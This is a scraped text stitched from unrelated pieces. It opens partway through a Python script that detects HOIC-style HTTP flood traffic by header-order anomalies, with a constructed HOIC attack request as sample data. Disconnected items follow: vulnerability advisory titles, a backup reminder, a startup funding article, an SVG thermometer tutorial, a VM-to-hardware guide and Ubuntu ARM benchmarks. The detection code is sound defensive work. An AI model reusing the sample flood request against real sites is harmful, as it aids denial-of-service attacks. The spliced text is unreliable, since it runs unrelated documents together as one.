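    # 2. No legitimate browser in the p0f signatures puts Host last.
    if names and names[-1] == "host":
        findings.append("host-header-last")
    # 3. Two spaces between the colon and the value (hex 3a 20 20 in the pcap).
    for name, raw_value in req.headers:
        if raw_value.startswith("  "):
            findings.append("double-space:" + name)
    return findings


# Constructed sample: HOIC-style request with GenericBoost headers and the
# double space after "User-Agent:" seen in the capture.
HOIC_REQUEST = (
    "GET / HTTP/1.0\r\n"
    "Accept: */*\r\n"
    "Accept-Language: en\r\n"
    "Referer: http://www.hoic_target_site.com/\r\n"
    "User-Agent:  Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.1; .NET CLR 1.1.4322)\r\n"
    "If-Modified-Since: Sat, 29 Oct 1994 11:59:59 GMT\r\n"
    "Host: www.hoic_target_site.com\r\n\r\n"
)

# Constructed sample: Chrome-like request following the p0f header ordering.
BROWSER_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Connection: keep-alive\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.77 Safari/535.7\r\n"
    "Accept: */*\r\n"
    "Referer: http://www.example.com/\r\n"
    "Accept-Encoding: gzip,deflate,sdch\r\n"
    "Accept-Language: en-US,en;q=0.8\r\n"
    "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n\r\n"
)


if __name__ == "__main__":
    for label, raw in (("hoic", HOIC_REQUEST), ("browser", BROWSER_REQUEST)):
        req = parse_request(raw)
        print(label, "|", header_order(req), "|", find_anomalies(req))
```

Each finding on its own is weak evidence (old proxies and some libraries also speak HTTP/1.0 with a Host header), so in practice the result would feed an anomaly score or a threshold such as the Snort rule's `count 15, seconds 30` rather than block on a single request.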
Apache Tomcat AJP Protocol Security Bypass Vulnerability
Everyone should be backing up their data. This just doesn’t go towards sysadmins, but even people at home who never even think of it. Just like everything else in I.T., hard drives were built to fail. If you do not make efficient back ups, you are at your own mercy when your drive will no longer spin up, meaning all that data is now gone.
Y Combinator alum Curebit, an online customer referral platform that leverages social media for “word-of-mouth” advertising, has just raised $1.2 million in funding. The investors include 500 Startups, Karl Jacob, Auren Hoffman, Dharmesh Shah, Gordon Tucker, Alex Lloyd of Accelerator Ventures, and others.
The funding will be used for continued product development and a slight expansion to the team involving three new hires (two developers, one designer) to the company’s now five-person outfit.
Curebit, for those unfamiliar, works to optimize the referral systems for eCommerce platforms and software-as-a-service (SaaS) companies (See previous coverage here).
The startup offers a few different ways for businesses to take advantage of its tools, the first being a post-purchase campaign that allows customers to share the details of the purchase on Facebook, Twitter or via email, as soon as the transaction completes.
“We figured when’s a better time than when you’ve basically voted with your wallet, saying ‘hey, I like this store,’” explains Curebit Co-founder Allan Grant.
Companies can also use Curebit’s technology to build standalone referral pages that are accessible at any time, or in one-off campaigns meant to further the reach of existing referral programs.
The startup says it now has around 1,000 customers, including everything from smaller e-commerce stores to larger customers like Giggle.com and a newly signed (but unannounced) top 20 retailer and a consumer foods company. The technology is also available as a plugin for 14 platforms, including Shopify and Magento.
By leveraging social media for the word-of-mouth referrals, Curebit’s customers see higher clicks and conversions than in traditional campaigns, where, for example, customers may have come in by way of ads. The referrals are like personal recommendations from friends, and often include a benefit, like a discount for the new customer, or for both the new customer and the friend who’s doing the referring.
When either the customer or the friend gets a deal via the referral, Curebit is seeing 15%-25% share rates. When the deal is double-sided (both people benefit), share rates are 45%-65%. Meanwhile, only 3% share using the standalone share button. Curebit also sees 1 to 5 clicks per share, depending on the product.
More unique products seem to do better than commodity products, notes Grant. And Curebit’s conversion rates are generally 2 to 3 times higher than traditional methods, and, in some cases, have been as high as 30%. Even better, Curebit’s referrals pay off in terms of dollars spent at checkout, too.
“The other thing we’ve seen consistently on just about every single site is that people spend more,” says Grant. “The average order amount is higher, and it’s not just higher based on how much the discount is – it’s higher even beyond that, even when you take the discount out.”
It’s the personal nature of the Curebit-powered recommendation that’s freeing people up to spend, it seems.

This temperature display may not knock your socks off, but it’s a simple demonstration of how you can use vector graphics as a web readout for data (translated). [Luca] wrote this four page tutorial to help others, he makes it look really easy, and the sky’s the limit on eye candy once you get the basics in place.
The first step is to create the dynamic SVG (vector graphic) file using Inkscape that will be used by the webpage. This starts with a static background, in this case the grey parts of the thermometer which will not change. Over the top the blue parts were added, with just a bit of XML editing to give those parts a hook which will be used in the next step. The demo above will have a moving blue bar and changing numeric output to match data coming in from a temperature sensor.
An SVG file is just a text file that is rendered as a graphic when loaded. [Luca] shows you how to use the identifiers set up when making the graphic to dynamically change the size and value of the blue parts with server-side PHP before sending the graphic to the browser. With that in place you just need to give the PHP file access to the data. He shows how to use the Pachube API but you could just as easily get this via serial or otherwise.
Navy Times: Chinese virus targets DoD Common Access Card
Linux Kernel CVE-2012-0056 Local Privilege Escalation Vulnerability
Symantec pcAnywhere Insecure File Permissions Vulnerability
Symantec pcAnywhere Host Services Remote Code Execution Vulnerability
Converting A VMware Image To A Physical Machine
This tutorial shows how to convert an existing CentOS VM to a physical machine. It covers the cloning of the VM to an unpartitioned HDD and troubleshooting some of the possible errors you may have booting the OS on your new hardware. To illustrate this procedure I will use VMware Workstation 7 as the handler to transfer the VM installation to a physical HDD.
As shared on Phoronix in many articles already, Canonical has big plans for Ubuntu in the ARM-space. They are looking forward to making Ubuntu Linux be the first operating system to support the forthcoming ARM Cortex A15, but before that and the other achievements they have planned, they must first ship Ubuntu 12.04 LTS. With Ubuntu 12.04 there is already some exciting improvements on the ARM front, including ARM hard-float support, better OMAP4 support, and other packaging improvements. In this article are some early benchmarks of Ubuntu 12.04 LTS “Precise Pangolin” from the PandaBoard ES. For some workloads, Ubuntu 12.04 is remarkably faster than Ubuntu 11.10.